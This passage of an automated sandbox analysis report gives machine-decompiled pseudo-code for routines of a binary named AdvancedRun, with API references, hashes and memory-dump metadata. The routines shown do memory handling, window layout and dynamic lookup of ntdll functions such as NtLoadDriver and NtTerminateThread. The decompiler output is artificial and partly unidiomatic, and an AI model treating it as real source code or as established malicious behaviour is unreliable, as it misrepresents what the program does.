                                                                  				signed int _t124;
                                                                  				signed int _t126;
                                                                  				signed int _t128;
                                                                  				intOrPtr* _t131;
                                                                  				signed int _t135;
                                                                  				signed int _t137;
                                                                  				signed int _t138;
                                                                  				void* _t141;
                                                                  				void* _t142;
                                                                  				void* _t146;
                                                                  
                                                                  				_t142 = __eflags;
                                                                  				_push(_t102);
                                                                  				_t131 = __eax;
                                                                  				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
                                                                  				E00406746(__eax);
                                                                  				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
                                                                  				_t135 = 5;
                                                                  				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
                                                                  				_t124 = 0x14;
                                                                  				_t74 = _t135 * _t124;
                                                                  				 *(_t131 + 0x2d0) = _t135;
                                                                  				_push( ~(0 | _t142 > 0x00000000) | _t74);
                                                                  				L0040B26C();
                                                                  				 *(_t131 + 0x2d4) = _t74;
                                                                  				_t126 = 0x14;
                                                                  				_t76 = _t135 * _t126;
                                                                  				_push( ~(0 | _t142 > 0x00000000) | _t76);
                                                                  				L0040B26C();
                                                                  				_t95 = 0x40f008;
                                                                  				 *(_t131 + 0x40) = _t76;
                                                                  				_v8 = 0x40f008;
                                                                  				do {
                                                                  					_t137 =  *_t95 * 0x14;
                                                                  					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
                                                                  					_t24 = _t95 + 0x14; // 0x40f01c
                                                                  					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
                                                                  					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
                                                                  					_t141 = _t141 + 0x18;
                                                                  					_v12 = _t85;
                                                                  					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
                                                                  					if((_t85 & 0xffff0000) == 0) {
                                                                  						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
                                                                  						_t93 = E00405B81(_v12 | 0x00010000);
                                                                  						_t95 = _v8;
                                                                  						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
                                                                  					}
                                                                  					_t95 = _t95 + 0x28;
                                                                  					_t146 = _t95 - 0x40f0d0;
                                                                  					_v8 = _t95;
                                                                  				} while (_t146 < 0);
                                                                  				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
                                                                  				_t138 = 5;
                                                                  				_t128 = 4;
                                                                  				_t87 = _t138 * _t128;
                                                                  				 *((intOrPtr*)(_t131 + 0x48)) = 1;
                                                                  				 *(_t131 + 0x2c) = _t138;
                                                                  				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
                                                                  				_push( ~(0 | _t146 > 0x00000000) | _t87);
                                                                  				L0040B26C();
                                                                  				_push(0xc);
                                                                  				 *(_t131 + 0x30) = _t87;
                                                                  				L0040B26C();
                                                                  				_t139 = _t87;
                                                                  				if(_t87 == 0) {
                                                                  					_t88 = 0;
                                                                  					__eflags = 0;
                                                                  				} else {
                                                                  					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
                                                                  				}
                                                                  				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
                                                                  				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
                                                                  				 *((intOrPtr*)(_t131 + 0x50)) = 0;
                                                                  				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
                                                                  				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
                                                                  				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
                                                                  				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
                                                                  				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
                                                                  				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
                                                                  				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
                                                                  				return E0040686C(_t131);
                                                                  			}

                                                                  0x004068ec
                                                                  0x004068f0
                                                                  0x004068f4
                                                                  0x004068ff
                                                                  0x00406902
                                                                  0x0040690a
                                                                  0x00406910
                                                                  0x00406911
                                                                  0x0040691b
                                                                  0x0040691e
                                                                  0x00406923
                                                                  0x0040692d
                                                                  0x0040692e
                                                                  0x00406933
                                                                  0x0040693d
                                                                  0x00406940
                                                                  0x00406949
                                                                  0x0040694a
                                                                  0x00406950
                                                                  0x00406956
                                                                  0x00406959
                                                                  0x0040695c
                                                                  0x00406964
                                                                  0x0040696d
                                                                  0x00406974
                                                                  0x0040697e
                                                                  0x00406989
                                                                  0x00406990
                                                                  0x00406998
                                                                  0x0040699b
                                                                  0x0040699f
                                                                  0x004069b8
                                                                  0x004069bc
                                                                  0x004069c4
                                                                  0x004069c7
                                                                  0x004069c7
                                                                  0x004069cb
                                                                  0x004069ce
                                                                  0x004069d4
                                                                  0x004069d4
                                                                  0x004069d9
                                                                  0x004069df
                                                                  0x004069e6
                                                                  0x004069ea
                                                                  0x004069ef
                                                                  0x004069f2
                                                                  0x004069f5
                                                                  0x00406a00
                                                                  0x00406a01
                                                                  0x00406a06
                                                                  0x00406a08
                                                                  0x00406a0b
                                                                  0x00406a10
                                                                  0x00406a16
                                                                  0x00406a25
                                                                  0x00406a25
                                                                  0x00406a18
                                                                  0x00406a1e
                                                                  0x00406a1e
                                                                  0x00406a27
                                                                  0x00406a2f
                                                                  0x00406a32
                                                                  0x00406a35
                                                                  0x00406a3b
                                                                  0x00406a41
                                                                  0x00406a47
                                                                  0x00406a4d
                                                                  0x00406a53
                                                                  0x00406a5d
                                                                  0x00406a6d

                                                                  APIs
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                  • memcpy.MSVCRT ref: 0040696D
                                                                  • memcpy.MSVCRT ref: 0040697E
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                  • String ID:
                                                                  • API String ID: 975042529-0
                                                                  • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                  • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                  • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                  • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                  Uniqueness
                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 83%
                                                                  			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                  				int _v8;
                                                                  				int _v12;
                                                                  				intOrPtr _v16;
                                                                  				void* _v20;
                                                                  				int _v24;
                                                                  				void _v56;
                                                                  				char _v584;
                                                                  				char _v588;
                                                                  				char _v41548;
                                                                  				void* __edi;
                                                                  				void* _t40;
                                                                  				void _t46;
                                                                  				intOrPtr _t47;
                                                                  				intOrPtr* _t64;
                                                                  				intOrPtr* _t66;
                                                                  				intOrPtr _t67;
                                                                  				intOrPtr _t71;
                                                                  				int _t77;
                                                                  				void* _t80;
                                                                  				void* _t81;
                                                                  				void* _t82;
                                                                  				void* _t83;
                                                                  
                                                                  				E0040B550(0xa248, __ecx);
                                                                  				_t77 = 0;
                                                                  				_v8 = 0;
                                                                  				E00408E31();
                                                                  				_t40 =  *0x41c47c;
                                                                  				if(_t40 != 0) {
                                                                  					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
                                                                  				}
                                                                  				if(_v8 == _t77) {
                                                                  					_v8 = 0x186a0;
                                                                  				}
                                                                  				_v8 = _v8 + 0x3e80;
                                                                  				_push(_v8);
                                                                  				L0040B26C();
                                                                  				_t81 = _t40;
                                                                  				_v20 = _t81;
                                                                  				memset(_t81, _t77, _v8);
                                                                  				_t83 = _t82 + 0x10;
                                                                  				_v24 = _t77;
                                                                  				E00408E31();
                                                                  				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
                                                                  				L5:
                                                                  				while(1) {
                                                                  					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
                                                                  						L16:
                                                                  						_t46 =  *_t81;
                                                                  						_t77 = 0;
                                                                  						if(_t46 == 0) {
                                                                  							_push(_v20);
                                                                  							L0040B272();
                                                                  							return _t46;
                                                                  						}
                                                                  						_t81 = _t81 + _t46;
                                                                  						continue;
                                                                  					}
                                                                  					_t47 = _a4;
                                                                  					_t71 =  *((intOrPtr*)(_t47 + 0x34));
                                                                  					_v12 = _t77;
                                                                  					_v16 = _t71;
                                                                  					if(_t71 <= _t77) {
                                                                  						L10:
                                                                  						_t66 = 0;
                                                                  						L11:
                                                                  						if(_t66 == 0) {
                                                                  							E004090AF( &_v588);
                                                                  							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                  							_t32 = _t81 + 0x20; // 0x20
                                                                  							memcpy( &_v56, _t32, 8);
                                                                  							_t83 = _t83 + 0x10;
                                                                  							E004099ED(_a4 + 0x28,  &_v588);
                                                                  						} else {
                                                                  							_t26 = _t66 + 4; // 0x4
                                                                  							_t72 = _t26;
                                                                  							if( *_t26 == 0) {
                                                                  								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                  								_t28 = _t81 + 0x20; // 0x20
                                                                  								memcpy(_t66 + 0x214, _t28, 8);
                                                                  								_t83 = _t83 + 0x10;
                                                                  							}
                                                                  						}
                                                                  						goto L16;
                                                                  					}
                                                                  					_t67 =  *((intOrPtr*)(_t81 + 0x44));
                                                                  					_t80 = _t47 + 0x28;
                                                                  					while(1) {
                                                                  						_t64 = E00405A92(_v12, _t80);
                                                                  						if( *_t64 == _t67) {
                                                                  							break;
                                                                  						}
                                                                  						_v12 = _v12 + 1;
                                                                  						if(_v12 < _v16) {
                                                                  							continue;
                                                                  						}
                                                                  						goto L10;
                                                                  					}
                                                                  					_t66 = _t64;
                                                                  					goto L11;
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                  • memset.MSVCRT ref: 00409805
                                                                  • memcpy.MSVCRT ref: 0040988A
                                                                  • memcpy.MSVCRT ref: 004098C0
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                  • String ID:
                                                                  • API String ID: 3641025914-0
                                                                  • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                  • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                  • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                  • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 68%
                                                                  			E004067AC(char** __edi) {
                                                                  				void* __esi;
                                                                  				void* _t9;
                                                                  				void** _t11;
                                                                  				char** _t15;
                                                                  				char** _t24;
                                                                  				void* _t25;
                                                                  				char* _t28;
                                                                  				char* _t29;
                                                                  				char* _t30;
                                                                  				char* _t31;
                                                                  				char** _t33;
                                                                  
                                                                  				_t24 = __edi;
                                                                  				 *__edi = "cf@";
                                                                  				_t9 = E00406746(__edi);
                                                                  				_t28 = __edi[5];
                                                                  				if(_t28 != 0) {
                                                                  					_t9 = E004055D1(_t9, _t28);
                                                                  					_push(_t28);
                                                                  					L0040B272();
                                                                  				}
                                                                  				_t29 = _t24[4];
                                                                  				if(_t29 != 0) {
                                                                  					_t9 = E004055D1(_t9, _t29);
                                                                  					_push(_t29);
                                                                  					L0040B272();
                                                                  				}
                                                                  				_t30 = _t24[3];
                                                                  				if(_t30 != 0) {
                                                                  					_t9 = E004055D1(_t9, _t30);
                                                                  					_push(_t30);
                                                                  					L0040B272();
                                                                  				}
                                                                  				_t31 = _t24[2];
                                                                  				if(_t31 != 0) {
                                                                  					E004055D1(_t9, _t31);
                                                                  					_push(_t31);
                                                                  					L0040B272();
                                                                  				}
                                                                  				_t15 = _t24;
                                                                  				_pop(_t32);
                                                                  				_push(_t24);
                                                                  				_t33 = _t15;
                                                                  				_t25 = 0;
                                                                  				if(_t33[1] > 0 && _t33[0xd] > 0) {
                                                                  					do {
                                                                  						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
                                                                  						_t25 = _t25 + 1;
                                                                  					} while (_t25 < _t33[0xd]);
                                                                  				}
                                                                  				_t11 =  *( *_t33)();
                                                                  				free( *_t11);
                                                                  				return _t11;
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                  • free.MSVCRT(00000000), ref: 00406839
                                                                    • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$free
                                                                  • String ID:
                                                                  • API String ID: 2241099983-0
                                                                  • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                  • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                  • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                  • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                  				intOrPtr _v12;
                                                                  				struct tagPOINT _v20;
                                                                  				struct tagRECT _v36;
                                                                  				int _t27;
                                                                  				struct HWND__* _t30;
                                                                  				struct HWND__* _t32;
                                                                  
                                                                  				_t30 = _a4;
                                                                  				if((_a8 & 0x00000001) != 0) {
                                                                  					_t32 = GetParent(_t30);
                                                                  					GetWindowRect(_t30,  &_v20);
                                                                  					GetClientRect(_t32,  &_v36);
                                                                  					MapWindowPoints(0, _t32,  &_v20, 2);
                                                                  					_t27 = _v36.right - _v12 - _v36.left;
                                                                  					_v20.x = _t27;
                                                                  					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                                  				}
                                                                  				if((_a8 & 0x00000002) != 0) {
                                                                  					E00404FBB(_t30);
                                                                  				}
                                                                  				return 1;
                                                                  			}

                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 00405D0A
                                                                  • GetWindowRect.USER32 ref: 00405D17
                                                                  • GetClientRect.USER32 ref: 00405D22
                                                                  • MapWindowPoints.USER32 ref: 00405D32
                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                  • String ID:
                                                                  • API String ID: 4247780290-0
                                                                  • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                  • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                  • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                  • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 89%
                                                                  			E004083DC(void* __eax, int __ebx, void* _a4) {
                                                                  				signed int _v8;
                                                                  				signed int _v12;
                                                                  				void* _v16;
                                                                  				void* _t20;
                                                                  				void* _t21;
                                                                  				signed int _t28;
                                                                  				void* _t32;
                                                                  				void* _t34;
                                                                  
                                                                  				_t20 = __eax;
                                                                  				_v12 = _v12 & 0x00000000;
                                                                  				_push(__ebx);
                                                                  				_t28 = __eax - 1;
                                                                  				L0040B26C();
                                                                  				_v16 = __eax;
                                                                  				if(_t28 > 0) {
                                                                  					_t21 = _a4;
                                                                  					_v8 = __ebx;
                                                                  					_v8 =  ~_v8;
                                                                  					_t32 = _t28 * __ebx + _t21;
                                                                  					_a4 = _t21;
                                                                  					do {
                                                                  						memcpy(_v16, _a4, __ebx);
                                                                  						memcpy(_a4, _t32, __ebx);
                                                                  						_t20 = memcpy(_t32, _v16, __ebx);
                                                                  						_a4 = _a4 + __ebx;
                                                                  						_t32 = _t32 + _v8;
                                                                  						_t34 = _t34 + 0x24;
                                                                  						_v12 = _v12 + 1;
                                                                  						_t28 = _t28 - 1;
                                                                  					} while (_t28 > _v12);
                                                                  				}
                                                                  				_push(_v16);
                                                                  				L0040B272();
                                                                  				return _t20;
                                                                  			}

                                                                  • Instruction addresses: 0x004083dc, 0x004083e2, 0x004083e9, 0x004083ea, 0x004083eb, 0x004083f3, 0x004083f6, 0x004083f8, 0x00408401, 0x00408404, 0x00408407, 0x00408409, 0x0040840c, 0x00408413, 0x0040841d, 0x00408427, 0x0040842c, 0x0040842f, 0x00408432, 0x00408435, 0x00408438, 0x00408439, 0x0040843e, 0x0040843f, 0x00408442, 0x0040844a

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$??2@??3@
                                                                  • String ID:
                                                                  • API String ID: 1252195045-0
                                                                  • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                  • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                  • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                  • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 76%
                                                                  			E00406746(void* __esi) {
                                                                  				intOrPtr _t9;
                                                                  				intOrPtr _t10;
                                                                  				intOrPtr _t11;
                                                                  				intOrPtr* _t18;
                                                                  				void* _t19;
                                                                  
                                                                  				_t19 = __esi;
                                                                  				_t9 =  *((intOrPtr*)(__esi + 0x30));
                                                                  				if(_t9 != 0) {
                                                                  					_push(_t9);
                                                                  					L0040B272();
                                                                  				}
                                                                  				_t10 =  *((intOrPtr*)(_t19 + 0x40));
                                                                  				if(_t10 != 0) {
                                                                  					_push(_t10);
                                                                  					L0040B272();
                                                                  				}
                                                                  				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
                                                                  				if(_t11 != 0) {
                                                                  					_push(_t11);
                                                                  					L0040B272();
                                                                  				}
                                                                  				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
                                                                  				if(_t18 != 0) {
                                                                  					_t11 =  *_t18;
                                                                  					if(_t11 != 0) {
                                                                  						_push(_t11);
                                                                  						L0040B272();
                                                                  						 *_t18 = 0;
                                                                  					}
                                                                  					_push(_t18);
                                                                  					L0040B272();
                                                                  				}
                                                                  				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
                                                                  				 *((intOrPtr*)(_t19 + 0x30)) = 0;
                                                                  				 *((intOrPtr*)(_t19 + 0x40)) = 0;
                                                                  				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
                                                                  				return _t11;
                                                                  			}

                                                                  • Instruction addresses: 0x00406746, 0x00406746, 0x0040674f, 0x00406751, 0x00406752, 0x00406757, 0x00406758, 0x0040675d, 0x0040675f, 0x00406760, 0x00406765, 0x00406766, 0x0040676e, 0x00406770, 0x00406771, 0x00406776, 0x00406777, 0x0040677f, 0x00406781, 0x00406785, 0x00406787, 0x00406788, 0x0040678e, 0x0040678e, 0x00406790, 0x00406791, 0x00406796, 0x00406798, 0x0040679e, 0x004067a1, 0x004067a4, 0x004067ab

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID:
                                                                  • API String ID: 613200358-0
                                                                  • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                  • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                  • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                  • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 87%
                                                                  			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                  				struct HDWP__* _v8;
                                                                  				intOrPtr _v12;
                                                                  				void* __ebx;
                                                                  				intOrPtr _t37;
                                                                  				intOrPtr _t42;
                                                                  				RECT* _t44;
                                                                  
                                                                  				_push(__ecx);
                                                                  				_push(__ecx);
                                                                  				_t42 = __ecx;
                                                                  				_v12 = __ecx;
                                                                  				if(_a4 != 5) {
                                                                  					if(_a4 != 0xf) {
                                                                  						if(_a4 == 0x24) {
                                                                  							_t37 = _a12;
                                                                  							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
                                                                  							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
                                                                  						}
                                                                  					} else {
                                                                  						E00402EC8(__ecx + 0x378);
                                                                  					}
                                                                  				} else {
                                                                  					_v8 = BeginDeferWindowPos(3);
                                                                  					_t44 = _t42 + 0x378;
                                                                  					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
                                                                  					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
                                                                  					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
                                                                  					EndDeferWindowPos(_v8);
                                                                  					InvalidateRect( *(_t44 + 0x10), _t44, 1);
                                                                  					_t42 = _v12;
                                                                  				}
                                                                  				return E00402CED(_t42, _a4, _a8, _a12);
                                                                  			}

                                                                  • Instruction addresses: 0x0040aba8, 0x0040aba9, 0x0040abb0, 0x0040abb2, 0x0040abb5, 0x0040ac19, 0x0040ac2c, 0x0040ac2e, 0x0040ac36, 0x0040ac39, 0x0040ac39, 0x0040ac1b, 0x0040ac21, 0x0040ac21, 0x0040abb7, 0x0040abcb, 0x0040abce, 0x0040abd7, 0x0040abe6, 0x0040abf6, 0x0040abfe, 0x0040ac09, 0x0040ac0f, 0x0040ac12, 0x0040ac4f

                                                                  APIs
                                                                  • BeginDeferWindowPos.USER32(00000003), ref: 0040ABBA
                                                                    • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                    • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
